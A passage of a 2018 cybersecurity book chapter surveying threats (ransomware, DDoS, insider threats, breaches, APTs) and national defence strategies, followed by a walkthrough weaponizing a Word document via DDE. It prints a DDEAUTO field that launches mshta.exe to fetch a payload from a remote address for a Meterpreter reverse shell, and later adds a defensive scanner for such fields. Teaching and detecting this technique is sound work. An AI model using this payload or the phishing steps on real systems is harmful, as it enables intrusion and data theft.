Hands-On Cybersecurity with Blockchain
Hands-On Cybersecurity with Blockchain: Implement DDoS protection, PKI-based identity, 2FA, and DNS security using Blockchain

Rajneesh Gupta
Paperback Jun 2018 236 pages 1st Edition

Cyber Threat Landscape and Security Challenges

Information has always been key to competitive advantage and sustainable success. Information is usually created when high volumes of trusted data are used to answer a simple question. Intelligence is developed by collecting information to produce a forecast that can be used in decision-making. Intelligence gathering is the most powerful and effective way to predict the future. From ancient intelligence to today's artificial intelligence, and from the world wars to today's cyberwar, the goal has always been to stay a step ahead of our adversaries.

Let's look at the real world. The Chinese government and its military, the People's Liberation Army (PLA), have been accused of stealing technology and trade secrets, often from private institutes in the US. You may think that China wants to destroy the US, but that's not true. China simply wants to be the superpower and the technology leader. Eventually, it wants every single American, and even the rest of the world, to be technologically dependent on the Chinese market. This results in a continuous stream of Chinese spying operations targeting multinational businesses and government institutes to gather trade secrets. Let's switch gears now. Political parties gather information about their own citizens through advanced analytics to predict upcoming election results. This shows the profound impact the internet is having on the world.

Cloud computing, IoT, cognitive computing, and mobility now manage most of an organization's critical assets; however, the growing number of interconnected applications and technologies also increases the number of exploitable vulnerabilities. Organizations deploy several security measures to locate and fix such vulnerabilities, but for security teams this is a never-ending job. Nevertheless, the top vulnerabilities can be prioritized by ranking them against the threats that could realistically exploit them, and that requires a mature threat intelligence practice.

Cybersecurity is a 20-year-old phenomenon, but in the past five years it has become far more challenging for defenders to protect themselves against emerging threats, such as zero-day exploits, crypto-ransomware, terabyte-scale DDoS attacks, multi-vector malware, and advanced social engineering.

This book sets out to bring about a paradigm shift in how security is perceived. Rather than adding yet another layer of security, it is an attempt to change the security mindset at a fundamental level. Blockchain is one of the most talked-about technologies since the internet; however, what makes the blockchain truly revolutionary is its potential for applications beyond cryptocurrencies. Today, numerous startups are using blockchain technology to disrupt existing business models and industry verticals such as cloud hosting, financial services, the supply chain, healthcare, cybersecurity, and many more. This book will be useful for security experts, security product engineers, and even blockchain enthusiasts. It takes readers on a tour of the current security threat landscape and offers a practical approach to overcoming some of the most critical security challenges with blockchain technology.

In this chapter, readers will learn about the following topics:

  • The current threat landscape
  • How defenders, including government bodies and businesses, are preparing themselves to defend their assets from adversaries
  • Live attack simulation to perform data exfiltration from a remote machine

Current threat landscape

In the new era of cyberspace, technological transformation has been the core driver of continuous security innovation and operations. The world of connected vehicles, IoT, mobility, and the cloud also opens up a focal point for cybercrime, targeted attacks, and industrial espionage. Once an attacker finds a vulnerability and determines how to reach an application, they have everything they need to build an exploit for it, so it is critical to develop strong vulnerability management. Remember, the effectiveness of vulnerability management depends on the organization's ability to keep up with emerging security threats and attack models.

Security systems won't make an impact if employees are lured into clicking on a malicious link they were sent over email. Social engineering has proven to be an effective way to get inside a target network, and security teams face endless challenges in identifying malicious entry. Back in the old days, before Facebook and LinkedIn, you could not find much information about an organization on the internet; the rise of social networking sites has made social engineering attacks far easier to perform.

Ransomware

Ransomware is malware that encrypts the information on a victim's computer and demands payment before access is restored. It is one of the most trending and high-return types of crimeware. It has attracted an enormous amount of media coverage in the past two years, mainly because of WannaCry, NotPetya, and Locky. The WannaCry ransomware spread rapidly across systems worldwide in May 2017. It hit several high-profile organizations, including the UK's National Health Service, the Spanish telephone giant Telefonica, the French automobile leader Renault, the leading US logistics company FedEx, the Japanese firm Hitachi, and many more.

The ransomware author hosts the service over the dark web, which allows any buyer to create and modify the malware.

The dark web is a part of the internet that can't be reached with a search engine but needs a special anonymity browser called Tor. In other words, the dark web carries unindexed data that is not available to search engines. The Tor browser routes the user's traffic through a series of relays, which makes the user's identity very hard to identify or trace. Dark websites look similar to ordinary websites, but their naming structure differs. Instead of a conventional top-level domain (TLD) such as .com, .net, or .co, they use addresses that end with .onion.

The monetization of hacking 

As per the cybersecurity business report, ransomware damage costs are predicted to hit 11.5 billion by 2019. There are several driving factors behind the growing operation of ransomware globally. To earn faster, cybercriminals have stopped making malware themselves and started leveraging Ransomware-as-a-service (RaaS), which is available over the dark web marketplace. 

These marketplaces don't just reduce the effort for expert criminals, but they also allow non-technical criminals or script kiddies to conduct ransomware operations.

The attacker produces a ransomware program with a preconfigured timer that ensures the destruction of data if a ransom is not paid before the specified time. Attackers also share a payment procedure, which is mostly through a Bitcoin wallet (since a digital cryptocurrency wallet provides anonymity).

WannaCry

The WannaCry attacks were the biggest ransomware attacks to date and occurred in May 2017. WannaCry made use of a vulnerability in the Windows OS that was first identified by the NSA and later made public through the Shadow Brokers. It was designed to exploit a vulnerability in Windows SMBv1 and SMBv2 so that it could move laterally within networks. By May 24, 2017, more than 200,000 computer systems had been infected in 150 countries.

NotPetya

NotPetya is another flavor of ransomware attack, launched in June 2017. The NotPetya ransomware resembles the Petya virus in several ways: it encrypts files and shows a screen requesting Bitcoin to restore them. The original infection method was a backdoor planted in M.E.Doc (a leading Ukrainian accounting company's software). After compromising a system through the M.E.Doc software, NotPetya used tools such as EternalBlue and EternalRomance to spread across the network. It also took advantage of a tool called Mimikatz to find administrator credentials on the compromised machine.

SimpleLocker

SimpleLocker was the first ransomware that did not affect computer systems but instead affected mobile phones. The OS the attackers targeted was Android, and the origin of this ransomware was traced to Eastern Europe. The Trojan targeted SD cards slotted into tablets and handsets, automatically crawling the entire card for certain files and then demanding cash to decrypt the data. The malware entered devices through the Google Play Store. Once installed, it scanned the affected device for various file types and encrypted them using the Advanced Encryption Standard (AES), changing the file extensions to .enc. It also collected other information from the device, such as the IMEI number, device model, and manufacturer, and sent this to a C2 server. With the latest versions of this malware, attackers can even access the device camera and display a picture of the victim to scare them into paying the ransom. This threat is still lurking out there.

TeslaCrypt

Within a year of CryptoLocker, a new threat came into existence: TeslaCrypt. At first, many believed it to be a variant of CryptoLocker, but it was later given its own name, TeslaCrypt. This ransomware targeted a different set of people: hardcore gamers. TeslaCrypt targeted and encrypted the ancillary files associated with video games, including saved game files, maps, game-related downloadable content, and so on. What made this ransomware unique was that its creators constantly improved the impact of the Trojan and closed its loopholes while the campaign was still ongoing.

CryptoLocker

CryptoLocker is a grand-scale ransomware that is believed to have first appeared on the internet on September 5, 2013, propagated through email attachments and over the Gameover Zeus botnet. It affected systems running Microsoft Windows, was spread through malicious email attachments, and encrypted certain types of files stored on the user's local and network drives using RSA encryption. CryptoLocker was taken down in late May 2014 through Operation Tovar, which dismantled the Gameover Zeus botnet. It was reported that CryptoLocker successfully extorted more than $3 million from victims.

PC Cyborg

In 1989, a Trojan named PC Cyborg was discovered that hid folders and then encrypted the names of the files on the C drive. The victim then had to pay $189 to the PC Cyborg Corporation, which was registered at a post office box in Panama.

Distributed denial-of-service (DDoS) attacks

A DDoS attack is a malicious attempt to disrupt a server's legitimate user traffic by overwhelming it with a flood of junk traffic. DDoS differs from DoS in its distributed nature: the target is attacked from several independent networks of compromised systems. These compromised computer systems are called bots, and a botnet is a group of such bots under the control of the same malicious actor.

DDoS attacks have become a frequent hazard, as they are commonly used for revenge, extortion, activism, and even cyberwar. In October 2016, the DNS infrastructure of the leading DNS provider Dyn was bombarded by a wave of DNS queries from millions of bots. The attack was executed by the Mirai botnet, which was composed of over 100,000 IoT devices.

From script kiddies to geopolitical

There are numerous theories about the attack launched on October 26, 2016 against Dyn's DNS infrastructure. It was one of the most sensitive and highest-impact DDoS attacks on record: Dyn, a US-based DNS service provider, was knocked out, which made several major websites, including Twitter, Reddit, GitHub, Amazon, Netflix, PayPal, and many more, inaccessible across a large part of the country. There are numerous theories and claims as to who was behind it. Security researchers pointed the finger of blame at script kiddies; however, the hacker group Jester claimed that the Russian government was behind the attacks, and Jester defaced the Russian foreign ministry's website in retaliation for the Democratic National Committee (DNC) hack.

It didn't stop there; there have been other high-profile incidents of late as well. The political crisis in Qatar led to a DDoS attack on Al Jazeera's website, and France's presidential election was disrupted by attacks on the Le Figaro and Le Monde websites.

Ease of launching a DDoS attack

DDoS attacks can be bought for as little as $10 an hour, $200, or $600-$1200 for an entire week. Several actors on the dark web offer DDoS-for-hire services that make launching such attacks easy.

Someone who is looking to bombard their targets with a burst of heavy traffic gets charged for every second of botnet use rather than an hourly fee.

Top targeted countries

Attackers can compromise a computer and turn it into a bot. These bots are used to conduct reconnaissance, crawl web pages, and even launch DDoS attacks. Countries with a larger number of compromised systems should be aware of their global risk index. The following is a diagram of the global DDoS threat landscape in Q2 2017 by a leading DDoS protection provider called Incapsula:

33% of businesses around the world were affected by DDoS attacks in 2017 alone, double the number affected in 2016.

Insider threats

Any form of threat can originate from inside an organization, and it's not limited to employees with malicious intent; the insider can be a contractor, former employee, board member, stockholder, or third-party entity.

Some more ways to define insider threats

CERT's Common Sense Guide to Mitigating Insider Threats defines an insider as a current or former employee, contractor, or business partner who meets the following criteria:

  • Has or had authorized access to an organization's network, system, or data
  • Has intentionally exceeded or intentionally used that access in a manner that negatively affected the confidentiality, integrity, or availability of the organization's information or information systems

Insider threat profile

Before the profile can be described, it is important to understand why it is needed. This need was identified by the US Department of Defense (DoD) in 2000, which is also when the CERT division's research was initiated. For an insight into the insider threat profile and its corresponding behavior, check out the link at https://ccdcoe.org/sites/default/files/multimedia/pdf/Insider_Threat_Study_CCDCOE.pdf.

A malicious threat that comes from within an organization, such as from employees, former employees, partners, associates, and so on, does not need to come from outside to affect the organization's systems. Such an attack is more menacing than external malware because it comes from people who already have access to the main systems and who have the knowledge to bypass security in a seemingly legitimate manner. Insider threats exist everywhere. If someone says that they are not prone to an insider threat, they may not actually know what one is and how fatal it can be for an organization. A so-called insider may try to access confidential files for personal gain. This gain can be anything from selling information to competitors to keeping it for the insider's own use.

The attrition rate in any organization is considerable. People leave and join companies every year or two. This motivates employees to keep certain information to themselves, as they feel entitled to hold on to it simply because they worked on it for a considerable amount of time. Not even the US government is free from insider threats. A report published in 2012 stated that most insider incidents actually take place during the employee's working hours. Although technology has made it easier to identify where a breach or attack started, in many cases there was no evidence, and the culprits were not identified.

Data breaches

In 2017, a study by the Ponemon Institute called the Cost of Cyber Crime Study showed that the average cost of a data breach is currently $3.62 million globally, which is actually a 10% decline from 2016.

Data breaches may involve the leaking of sensitive corporate documents, technical blueprints, intellectual property, trade secrets, or even emails. Breaches have always been numerous, and their impact on businesses is growing. Sophisticated attackers are capable of weaponizing malware tailored to the target and are also managing to deliver it silently.

As per Mandiant's M-Trends 2017 report, most victim organizations were notified about the breach by someone other than their own staff: more than 53% of breaches were discovered by an external source. Organizations should have a proactive breach management plan so that they detect a breach before an outsider notifies them. The earlier a breach is detected, the more money an organization saves. The Ponemon Institute also suggested that organizations should aim to identify a breach within 100 days. The average cost of a breach detected within this time is $5.99 million, but for those without the tools to detect it, the average cost rose to $8.70 million. Data breaches happen in several ways, and the following are some of the most common causes:

  • Malicious attacks: Adversaries can launch a malware or malware-less attack, leveraging application vulnerabilities to exfiltrate sensitive information.
  • Weak security systems: Attackers have become more advanced and persistent. They can use stolen credentials to look like legitimate users on the network and thereby bypass existing security systems such as firewalls, intrusion prevention systems (IPS), and endpoint security.
  • Human error: As per the 2017 Verizon Data Breach Investigations Report, 88% of data breaches involve human error. Human error is something that all organizations have to deal with.

Notable recent data breaches

Some of the most notable recent data breaches are as follows:

  • Equifax in September 2017: Equifax, one of the three largest credit agencies in the US, suffered a breach that affected 143 million consumers. An unknown threat group succeeded in compromising Equifax's online services by exploiting the Apache Struts vulnerability CVE-2017-5638. Due to the sensitivity of the stolen data, including Social Security Numbers (SSNs) and driver's license numbers, this was one of the worst breaches of all time.
  • Verizon in July 2017: Around 14 million Verizon subscribers may have been affected by the data breach. The compromised server was managed by the Israel-based company NICE Systems.
  • Edmodo on May 31, 2017: More than 78 million users had their information stolen from the education platform Edmodo. This became public when a hacker known as nclay was found selling 77 million Edmodo accounts on the dark web for $1,000.
  • Verifone on March 7, 2017: Verifone, the leading maker of point of sale (POS) credit card terminals used in the US, discovered a massive data breach of its internal network. Sources indicate that there is evidence that a Russian hacking group was involved in the breach.

Impact of data breaches

The consequences for businesses that lose customer or partner information, or any other confidential data, are severe and growing. The Ponemon Institute, an independent security research company, surveyed organizations that had suffered a data breach to find out its impact:

  • Financial loss: Around 113 listed companies that experienced a data breach had their stock price drop an average of 5%, which resulted in a loss of their customer base
  • Brand reputation loss: 61% of CMOs believe that the biggest cost of a data breach is the loss of a brand's value
  • Customer trust loss: Consumers trust financial institutes, healthcare providers, and even government departments, to preserve their personal information and privacy

To get an insight into each impact, take a look at the following Ponemon Institute report from 2017: https://www.centrify.com/media/4772757/ponemon_data_breach_impact_study_uk.pdf.

Advanced persistent threat (APT)

An APT uses multiple phases to break into a network, avoid detection, and harvest valuable information over the long term:

  • Advanced: It is an advanced attack because it is made up of a broad spectrum of infection vectors and malware technologies that are available to the attacker, which are blended together to result in the successful compromise of a system.
  • Persistent: It is persistent because the threat of being compromised is always there.
  • Threat: This is not a typical, run-of-the-mill system compromise. This attack poses a real threat to the target, not only because it is backed by highly organized, well-funded, and motivated criminal elements, but also because if the attack is successful, it can have dire consequences for the target way beyond a normal system cleanup.

With technological advancements, new ways have emerged to stalk corporate entities and businesses of every kind, and the APT is one of them. An APT can be described as an attack on an organization's network that allows unauthorized people to remain inside the network for a long period of time without being detected.

What makes APTs so different?

APTs differ from regular cybercriminals in their selection of a target, their goal, and the human factors involved:

  • Targets: They are chosen based on financial, political, geopolitical, surveillance, and security intelligence interests to gain high-value information
  • Goal: The goal of an APT is not to simply get in and get out, but to gain prolonged access to the network's resources and keep themselves undetected by security administrators
  • Human factors: This is a critical element for the entire APT operation, since the operation can occur through spear phishing or even insider threats

For more information on data exfiltration, follow the link at http://about-threats.trendmicro.com/cloud-content/us/ent-primers/pdf/how_do_threat_actors_steal_your_data.pdf.

Defender perspectives

Having understood the emerging threat landscape and some of the most effective cyberattacks, it is important to work on our own defense. These threat groups have everything they need to discover an organization's assets, find the vulnerabilities, and build their weapons accordingly. This is a huge concern for organizations that have been non-adaptive, sometimes for decades, but let's also accept that a good number of bodies have been brilliant at achieving cyber hygiene and building better cyber defense ecosystems. Let's focus on some of these bodies, including governments and businesses.

Governments

Government electronic systems have long been targeted by foreign security agencies gathering intelligence. With the growing use of interconnected technology, government systems also face the challenge of an increasing attack surface. It is important that government authorities become better at protecting their critical assets.

The United States (US)

US President Donald Trump signed an executive order on May 11, 2017 that covers strengthening the cybersecurity of the federal network, emphasizing accountability, an adaptation of the framework to improve its critical infrastructure, and modernizing existing cybersecurity systems. The DoD has also presented its own strategy on strengthening cyber defense and cyber deterrence postures, and this includes three primary cyber missions, as shown in the following screenshot:

Cyber mission force plan to form 133 teams by 2018

To understand more about the DoD's strategy on strengthening its cyber defense and cyber deterrence posture, follow the link at https://www.defense.gov/News/Special-Reports/0415_Cyber-Strategy/.

The United Kingdom (UK)

With the National Cyber Security Strategy (NCSS) 2016-2021, the United Kingdom's government has planned to make its country secure and resilient. This vision is summarized in the following three objectives:

  • To defend cyberspace: Ensure that UK networks, data, and systems are protected and resilient, so that UK citizens, corporations, and public institutions have the expertise and ability to defend themselves.
  • To deter adversaries: Detect, understand, investigate, and disrupt cyber threats against the UK.
  • To develop its capabilities: Build a self-sustaining pool of talent that provides the necessary skills to UK nationals across the public and private sectors.

To get an insight into the UK NCSS program, follow the link at https://www.gov.uk/government/publications/national-cyber-security-strategy-2016-to-2021.

Europe

The European Union Agency for Network and Information Security (ENISA) serves as a center of expertise and excellence in network and information security for both member states and EU institutions. Its major notable initiatives include the Annual Privacy Forum (APF), the ENISA Threat Landscape (ETL), and Cyber Europe, a pan-European exercise to protect the EU against coordinated cyberattacks.

In 2018, the General Data Protection Regulation (GDPR) will replace the Data Protection Directive 95/46/EC, with the following key changes under its increased territorial scope: penalties, consent, breach notification, right to access, right to be forgotten, data portability, privacy by design, and data protection officers. To get an insight into each area of GDPR, visit the link at https://www.eugdpr.org/key-changes.html.

India

In February 2017, the Indian government's Computer Emergency Response Team (CERT-In) launched Cyber Swachhta Kendra, a Botnet Cleaning and Malware Analysis Center to create a secure Indian cyberspace through detecting and cleaning bots in user endpoints. To know more about India's initiative on the bot cleaning program and how other bodies are helping the government to achieve this goal, visit the link at http://www.cyberswachhtakendra.gov.in/.

Corporate

With the rapid adoption of mobility, cloud, and IoT, businesses are ever more exposed to potential threats. In fact, some of the most trending technologies, such as Bring Your Own Device (BYOD), make insider threats both more likely and more severe. Even spending millions of dollars on preventive security never gives complete assurance, and this has led organizations to explore emerging defense technologies that detect and combat advanced threats capable of bypassing existing security systems. In many multinational organizations, the Chief Information Security Officer (CISO) wears multiple hats at once. In 2018, every CISO will be making critical decisions about their organization's security.

Some of the emerging security defenses are mentioned here.

Endpoint detection and response (EDR)

EDR is a solution designed to detect malicious activity on endpoints and remove it from the network. EDR solutions typically include the following four capabilities:

  • Detecting threats through continuous monitoring of endpoints
  • Collecting and investigating logs, and correlating them with the historical activity of each endpoint
  • Responding to dangerous activity by isolating the affected resources from the network
  • Killing unauthorized processes to return the endpoint to a known-good state

Deception technology

Deception has been used in warfare from ancient armies through the world wars, and it is now being used in cyberspace. In a nutshell, this technology lures attackers into penetrating a decoy target system. With deception, enterprises can detect attackers and gather insights into their behavior and artifacts, which in turn helps improve their defenses. Deception can be deployed at multiple levels of the stack, including network devices, endpoints, and applications.

Cyber threat intelligence (CTI)

CTI is a way of analyzing the capabilities of adversaries. In cyberspace, it is often delivered in the form of indicators of compromise (IOCs), which include malicious IP addresses, domain names, file hashes, and so on. It is critical for organizations to understand their assets, their people, and every connected third party so that they can build their own threat intelligence and plan to strengthen their defenses.

Live attack execution

In recent attacks, adversaries have executed arbitrary code from a Microsoft Word document without using any macros or scripts. The technique abuses a legitimate Microsoft Office feature called Dynamic Data Exchange (DDE).

Let's look at this attack from a cyber kill chain perspective. The cyber kill chain is used to describe the stages of an attack:

  • Reconnaissance: This is a planning phase where the attacker gathers information about something through observation or other detection methods. Cyberattack planning and reconnaissance often include conducting research about the target, usually with open source information gathering tools, such as Google and Shodan, as well as through searches of publicly available data, such as public announcements and social media, company profiles for email, and email harvesting.
  • Weaponization: In this stage, a threat actor plans for the right attack method. The threat actor can even plan to exploit an employee by phishing their email or even with a drive-by download attack. In our example, first we will create a malicious document. In the blank document, go to the Insert | Quick Parts | Field... tab, as shown in the following screenshot:

In the Field names dialog box, select the =(Formula) option to insert our DDE exploit code:

After this, you will see a field in the document with an error: !Unexpected End of Formula. Right-click on that field, and choose the Toggle Field Codes option. You need to do this to craft a DDE Object payload in the text field, which will start the malware or any code of our choice when the document is opened:

In the text field, enter the following code:

DDEAUTO C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe "http://192.168.1.101:8080/8b0HTF3MdgqYqgK

Then, save the document with any name of your choice, such as Financial_Statement:

  • Delivery: Endpoints are the primary means of delivery, whether through a drive-by download from a website, a targeted phishing attack, or an infection carried in on an employee-owned device connected over a secure virtual private network (VPN).
  • Exploitation and installation: At this stage, the attacker takes advantage of a software or human weakness to get the payload to run. In DDE exploitation, the adversaries send an email containing the malicious document. When the user opens that document, the adversaries get a reverse shell on the victim's machine.

Let's see how the adversaries built the exploit during the weaponization stage and how they gained access to the victim's machine. The adversaries created the malicious payload document and sent it to the victim by email. Take a look at the following screenshot:

When the user opened the document sent by the adversaries, the payload was executed after one error message, as shown in the following screenshot:

If the user chooses to start the malicious document, the payload will be executed and a Meterpreter session will open:

Action on objectives: At this stage, the threat actor has succeeded and has access to the organization's sensitive files. The adversary tries to exfiltrate data from the victim's machine; there are many confidential files here that the adversaries try to exfiltrate:

The adversaries take a screenshot of what the victim is doing and try to find out what process is running on the machine, as shown in the following screenshot:
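From the defender's side, the weaponization step above leaves a concrete artifact: a field code containing DDEAUTO (or DDE) inside the document's WordprocessingML. The following scanner is an added example, not code from the book, and assumes only the standard library: it opens a .docx as a zip archive, reassembles each field instruction across its w:instrText runs (Word splits them, and evasive samples split them deliberately), and flags DDE fields. The sample document it builds is a constructed, minimal package holding only word/document.xml, which is enough for the scanner but is not a complete Word file.

```python
import html
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS
# Field codes that start a DDE conversation; DDEAUTO fires when the document opens.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)


def extract_field_codes(part_xml: bytes) -> list:
    """Return every field instruction in one WordprocessingML part. Complex fields
    span w:fldChar begin ... w:instrText ... w:fldChar end, often over several runs;
    nested fields are flattened into the outermost code so a DDE wrapped in another
    field is still seen."""
    root = ET.fromstring(part_xml)
    codes, buf, depth = [], [], 0
    for el in root.iter():  # document order
        if el.tag == W + "fldSimple":
            codes.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    codes.append("".join(buf))
                    buf = []
        elif el.tag == W + "instrText" and depth > 0:
            buf.append(el.text or "")
    return [" ".join(c.split()) for c in codes]  # collapse run and whitespace splits


def find_dde_fields(docx_bytes: bytes) -> list:
    """Scan every word/*.xml part (body, headers, footers) for DDE field codes."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                hits += [c for c in extract_field_codes(zf.read(name)) if DDE_RE.search(c)]
    return hits


def build_sample_docx(instr_runs: list) -> bytes:
    """Constructed test input: a minimal package with only word/document.xml (not a
    complete Word file), holding one complex field whose instruction is split across
    the given runs, as Word itself and obfuscated samples both do."""
    runs = "".join('<w:r><w:instrText xml:space="preserve">%s</w:instrText></w:r>'
                   % html.escape(r) for r in instr_runs)
    body = ('<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>%s'
            '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
            '<w:r><w:t>!Unexpected End of Formula</w:t></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>' % runs)
    xml = '<w:document xmlns:w="%s"><w:body>%s</w:body></w:document>' % (W_NS, body)
    out = io.BytesIO()
    with zipfile.ZipFile(out, "w") as zf:
        zf.writestr("word/document.xml", xml)
    return out.getvalue()


if __name__ == "__main__":
    sample = build_sample_docx(["DDE", "AUTO C:\\Windows\\System32\\", 'cmd.exe "/k calc.exe"'])
    for code in find_dde_fields(sample):
        print("DDE field found:", code)
```

Pointing `find_dde_fields` at real mail attachments, or running it as a mail-gateway hook, catches this weaponization before the document ever reaches a user, and a benign field such as DATE produces no hit.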

Emerging security challenges

Every organization has to take part in this never-ending race against cyber attackers. If you fail to stay ahead of your adversaries, you are likely to become the victim of an attack. In the coming years, defenders have to prepare themselves for some emerging security challenges and threats. These are as follows:

  • Slow security adaptation: Unlike networking and cloud transformation, cyber security solutions are not evolving at the expected rate. The traditional network segmentation has been replaced with a simplified and flat architecture, removing lots of network complexity. However, security solutions still use the traditional zone-based approach to mitigate threats.
  • Human error: As per the IBM Security Services report, more than 95% of investigated cyber incidents occurred due to human errors, such as system misconfiguration and insufficient patch management.
  • Third-party vendor security risk: In a world of interconnected businesses, organizations have to let other organizations store and use their information for better business operations, but this also increases risk. If a third party is compromised, the organization is at risk of losing business data. Most supply chain attacks use sophisticated attack vectors that manage to bypass existing security systems.

Summary

After understanding the current threat landscape, the defender's perspective, a live attack simulation, and the root causes of security failure, it is clear that there is no silver bullet for data breaches and other advanced targeted attacks. Adversaries change their weapons and tactics in step with changes in technology and business processes, and in response, defenders are aggressively exploring various security tools. It is also clear that attackers do not need to be sophisticated to perform a sophisticated data breach; they simply have to be opportunists. With the open source tools and free online reconnaissance platforms available, threat actors are able to discover assets and their corresponding vulnerabilities.

In the next chapter, you will learn about some effective ways to deploy cyber security systems.

Questions

The world of cyberspace always leaves room for questions about the real risks to businesses and organizations, achieving better defensive strategies, and situations where security can go wrong. Some of the most widely asked questions are as follows:

  1. How do you keep an organization updated with an adversary's capabilities in cyberspace?
  2. How do you prepare effective cyber threat intelligence?
  3. How do we adapt to the emerging cyber security technologies?

Further reading

Key benefits

  • Understanding the blockchain technology from the cybersecurity perspective
  • Developing cyber security solutions with Ethereum blockchain technology
  • Understanding real-world deployment of blockchain based applications

Description

Blockchain technology is being welcomed as one of the most revolutionary and impactful innovations of today. Blockchain technology was first identified in the world’s most popular digital currency, Bitcoin, but has now changed the outlook of several organizations and empowered them to use it even for storage and transfer of value. This book will start by introducing you to the common cyberthreat landscape and common attacks such as malware, phishing, insider threats, and DDoS. The next set of chapters will help you to understand the workings of Blockchain technology, Ethereum and Hyperledger architecture and how they fit into the cybersecurity ecosystem. These chapters will also help you to write your first distributed application on Ethereum Blockchain and the Hyperledger Fabric framework. Later, you will learn about the security triad and its adaptation with Blockchain. The last set of chapters will take you through the core concepts of cybersecurity, such as DDoS protection, PKI-based identity, 2FA, and DNS security. You will learn how Blockchain plays a crucial role in transforming cybersecurity solutions. Toward the end of the book, you will also encounter some real-world deployment examples of Blockchain in security cases, and also understand the short-term challenges and future of cybersecurity with Blockchain.

Who is this book for?

The book is targeted towards security professionals, or any stakeholder dealing with cybersecurity, who wants to understand the next level of securing infrastructure using Blockchain. A basic understanding of Blockchain is an added advantage.

What you will learn

  • Understand the cyberthreat landscape
  • Learn about Ethereum and Hyperledger Blockchain
  • Program Blockchain solutions
  • Build Blockchain-based apps for 2FA and DDoS protection
  • Develop Blockchain-based PKI solutions and apps for storing DNS entries
  • Challenges and the future of cybersecurity and Blockchain

Product Details

Publication date : Jun 28, 2018
Length: 236 pages
Edition : 1st
Language : English
ISBN-13 : 9781788990189
Table of Contents

12 Chapters

  1. Cyber Threat Landscape and Security Challenges
  2. Security Must Evolve
  3. Introducing Blockchain and Ethereum
  4. Hyperledger – Blockchain for Businesses
  5. Blockchain on the CIA Security Triad
  6. Deploying PKI-Based Identity with Blockchain
  7. Two-Factor Authentication with Blockchain
  8. Blockchain-Based DNS Security Platform
  9. Deploying Blockchain-Based DDoS Protection
  10. Facts about Blockchain and Cyber Security
  11. Assessment
  12. Other Books You May Enjoy
